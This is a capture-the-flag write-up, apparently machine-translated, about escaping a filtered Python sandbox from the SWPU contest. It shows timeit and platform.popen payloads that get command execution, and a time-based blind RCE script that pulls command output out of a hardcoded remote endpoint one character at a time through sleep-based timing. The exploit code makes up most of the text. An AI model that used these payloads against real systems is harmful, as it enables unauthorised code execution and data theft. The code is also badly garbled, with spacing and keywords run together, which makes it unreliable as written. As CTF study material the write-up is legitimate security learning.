Remember a python sandbox escape bypass (time based RCE)

A few days ago participated in the eighth session of SWPU, the topic quality is very high, learned a lot of things. Here I have a Python sandbox escape topic to do some summary.

The topic is very strict filtering, file read and write, network requests and some dangerous modules are banned. Even underscores are detected, which makes the __builtin__,[].__class__.__base__.__subclasses__ () Magic method unusable.

Finally learned that the use of a built-in module: Timeit. I believe a lot of beginners of Python will use the Timeit module to get the execution time of the code, and see its documentation that can lead to arbitrary code execution.

# Coding:utf-8 Import Timeittimeit.timeit ("__import__ (' OS '). System (')", Number=1)

There is also a module platform agreed to also line.

Import Platformplatform.popen ('ID', mode='r', bufsize=-1 ). Read ()

The OS module is loaded with the __import__ built-in function in the Timeit module and can then be executed arbitrarily, but it cat flag is not echoed, This is because the execution time of the code is returned. Plus here I put the launch network request also to ban, so do not pass the Cloudeye and other take-off channel to get command execution results.

So here is a special case: a no echo cannot access the external network command execution, how to get the results returned? The answer is: Time based rce.

You can see the author's blog http://icematcha.win/?p=532

The last similar to the blind footnote is as follows:

#Coding:utf-8#Author:icematchaImportRequestsImportSYSImportbase64payloads="qwertyuiiopasdfghjklzxcvbnm1234567890="defrequest (URL, data, timeout):Try: Res= Requests.post (URL, data = data, timeout =Timeout)returnres.contentexcept:        returnTruedefget_length (url, cmd, timeout): Length="'      forIinchXrange (1,10): Value=" "#!/usr/bin/python#coding:utf-8import Timeittimeit.timeit ("__import__ (' OS ')." System (' if [$ (%s|base32|wc-c|cut -C%s) =];then sleep 2;fi ') ", number=1)" "%(cmd, i) data= {'Process': Value} res=request (URL, data, timeout)ifRes:llength=I Break     forIinchXrange (1, llength): for_inchXrange (1, 10): Value=" "#!/usr/bin/python#coding:utf-8import Timeittimeit.timeit ("__import__ (' OS ')." System (' if [$ (%s|base32|wc-c|cut- C%s) =%s];then sleep 2;fi ') ", number=1)" "%(cmd, I, _) data= {'Process': Value}ifrequest (URL, data, timeout): Length+=Str (_)Printlength Break    returnlengthdefget_content (url, cmd, timeout, length): Content="'     forIinchXrange (1, int (length) +1):         forPayloadinchPayloads:value=" "#!/usr/bin/python#coding:utf-8import Timeittimeit.timeit (' __import__ (' OS '). System (' If [$ (%s|base32|cut-c%s) = %s];then sleep 2;fi ') ", number=1)" "%(cmd, I, payload) data= {'Process': Value}ifrequest (URL, data, timeout): Content+=PayloadPrintcontent Break    returncontentif __name__=='__main__': Length= Get_length ('Http://47.95.252.234/runcode','Cat Flag', 2.0)    Print "# # The Base32 of content ' s length is:%s"%Length Content= Get_content ('Http://47.95.252.234/runcode','Cat Flag', 2.0, Length)Print "# # The base32 of content is:%s"%contentPrint "# # The commend result content is:%s"% Base64.b32decode (content). Strip ()

Remember a python sandbox escape bypass (time based RCE)